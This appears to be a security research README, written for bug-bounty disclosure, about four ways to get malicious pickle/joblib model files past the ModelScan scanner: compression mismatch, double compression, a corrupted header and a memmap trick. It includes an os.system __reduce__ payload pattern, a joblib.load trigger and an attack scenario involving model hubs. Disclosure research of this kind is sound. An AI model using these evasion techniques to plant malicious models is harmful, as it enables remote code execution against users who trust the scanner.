ModelScan Bypass Research

Security Research - Do Not Use in Production

Overview

This repository contains proof-of-concept files demonstrating bypass techniques for ModelScan, a popular ML model security scanner. These techniques allow malicious pickle-based model files to evade detection.

Files

1. exploit_compression_mismatch.joblib.gz

  • Technique: Compression method mismatch
  • Description: File extension indicates gzip (.gz) but content is BZ2 compressed
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()
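
As a sketch, the mismatch can be reproduced with the standard library alone; the payload here is a harmless dict, and the filename mismatch_demo.joblib.gz is illustrative rather than one of the repo files:

```python
import bz2
import gzip
import pickle

# Harmless stand-in payload; a real exploit would pickle an object
# carrying a malicious __reduce__ method instead.
payload = pickle.dumps({"weights": [0.1, 0.2, 0.3]})

# Compress with BZ2, but save under a gzip (.gz) extension.
blob = bz2.compress(payload)
with open("mismatch_demo.joblib.gz", "wb") as f:
    f.write(blob)

# An extension-driven scanner tries gzip decompression, fails, and
# skips the file instead of analyzing the pickle inside.
try:
    gzip.decompress(blob)
    gzip_ok = True
except OSError:  # gzip.BadGzipFile is an OSError subclass
    gzip_ok = False

# joblib, by contrast, detects the compressor from the file's magic
# bytes rather than its name, so the BZ2 content still unpickles
# when the file is loaded.
roundtrip = pickle.loads(bz2.decompress(blob))
```

The asymmetry is the whole bypass: the scanner trusts the extension, while the loader trusts the bytes.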

2. exploit_double_compression.joblib.gz.bz2

  • Technique: Nested/double compression
  • Description: Payload compressed twice (gzip then bz2)
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()
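
A minimal sketch of the double wrapping, again with a benign payload and a made-up filename (double_demo.joblib.gz.bz2):

```python
import bz2
import gzip
import pickle

# Harmless stand-in payload; a real exploit would pickle an object
# carrying a malicious __reduce__ method instead.
payload = pickle.dumps(["model", "state"])

# Compress twice: gzip first, then BZ2, matching the .gz.bz2 name.
double = bz2.compress(gzip.compress(payload))
with open("double_demo.joblib.gz.bz2", "wb") as f:
    f.write(double)

# A scanner that strips only one layer sees gzip magic bytes,
# not pickle opcodes, so no pickle analysis takes place.
inner = bz2.decompress(double)
is_gzip_inside = inner[:2] == b"\x1f\x8b"  # gzip magic number

# Both layers must be removed before the pickle is visible at all.
recovered = pickle.loads(gzip.decompress(inner))
```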

3. exploit_corrupt_header.joblib.gz

  • Technique: Malformed compression header
  • Description: Gzip file with corrupted header (first byte modified to 0x00)
  • ModelScan Result: SKIPPED - Scanner did not analyze this file
  • Impact: RCE triggers during joblib.load()
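
The header corruption can be sketched as follows; the payload is benign and the filename corrupt_demo.joblib.gz is illustrative:

```python
import gzip
import pickle

# Harmless stand-in payload; a real exploit would pickle an object
# carrying a malicious __reduce__ method instead.
blob = gzip.compress(pickle.dumps({"layer": 1}))

# Overwrite the first gzip magic byte (0x1f) with 0x00.
corrupted = b"\x00" + blob[1:]
with open("corrupt_demo.joblib.gz", "wb") as f:
    f.write(corrupted)

# Standard gzip tooling now rejects the file, so a scanner that
# decompresses before analyzing aborts and skips it.
try:
    gzip.decompress(corrupted)
    rejected = False
except OSError:  # gzip.BadGzipFile is an OSError subclass
    rejected = True
```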

4. exploit_memmap_bypass.joblib ⭐ PRIMARY FINDING

  • Technique: Memory-mapped array bypass
  • Description: Uses joblib's memmap feature combined with a malicious __reduce__ method
  • ModelScan Result: SCANNED but found NO ISSUES ✅
  • Impact: RCE triggers during joblib.load()
  • Significance: This is a TRUE bypass - scanner analyzed the file but missed the RCE

Reproduction Steps

Testing with ModelScan

# Install ModelScan
pip install modelscan

# Test each exploit
modelscan scan -p exploit_compression_mismatch.joblib.gz
modelscan scan -p exploit_double_compression.joblib.gz.bz2
modelscan scan -p exploit_corrupt_header.joblib.gz
modelscan scan -p exploit_memmap_bypass.joblib

Expected Results

  • Files 1-3: ModelScan will skip these files (not analyzed)
  • File 4: ModelScan will scan but report "No issues found! 🎉" ⚠️

Triggering the Exploit (⚠️ DO NOT RUN ON PRODUCTION)

import joblib

# This will execute arbitrary code!
model = joblib.load('exploit_memmap_bypass.joblib')

Technical Details

How the Bypass Works

All four exploits use Python's pickle __reduce__ method for RCE:

class MaliciousPayload:
    def __reduce__(self):
        import os
        # Called automatically during unpickling; the returned
        # (callable, args) pair is invoked, executing the command.
        return (os.system, ('malicious_command',))
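
The primitive can be demonstrated end to end with a benign callable; LoadTimePayload is a made-up name, and print stands in for os.system:

```python
import pickle


class LoadTimePayload:
    """Benign demo: unpickling invokes a callable chosen by the
    author (print here, where an exploit would use os.system)."""

    def __reduce__(self):
        # Serialized as "call print(...) at unpickling time".
        return (print, ("executed during pickle.loads",))


blob = pickle.dumps(LoadTimePayload())

# The stream references builtins.print by name -- exactly the kind
# of global reference a pickle scanner is supposed to flag.
has_global_ref = b"builtins" in blob

# Deserializing calls print(); the "object" that comes back is the
# callable's return value (None for print).
result = pickle.loads(blob)
```

Note that nothing about the class survives deserialization: the victim never gets a model object, only the side effect.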

The vulnerability: ModelScan should detect this pattern, but its analysis fails when:

  1. Compression methods don't match file extensions
  2. Files are double-compressed
  3. Compression headers are malformed
  4. Files use joblib's memmap feature

Why This Matters

  • Users trust ModelScan to detect malicious models
  • These bypass techniques allow attackers to evade detection
  • Malicious models could be uploaded to model hubs undetected

Security Impact

Severity: HIGH

Attack Vector:

  1. Attacker creates malicious model using one of these techniques
  2. Uploads to model hub (HuggingFace, etc.)
  3. Victim downloads and scans with ModelScan
  4. Scanner reports "No issues found!"
  5. Victim loads model → RCE

Disclosure

This research is being submitted to Huntr's bug bounty program for responsible disclosure.

Date: December 25, 2024
Researcher: Security Research Team

Disclaimer

⚠️ For Security Research Only

These files are provided for security research and vulnerability disclosure purposes only. Do not use these techniques for malicious purposes. Loading these files will execute code.


Status: Under responsible disclosure to Huntr bug bounty program
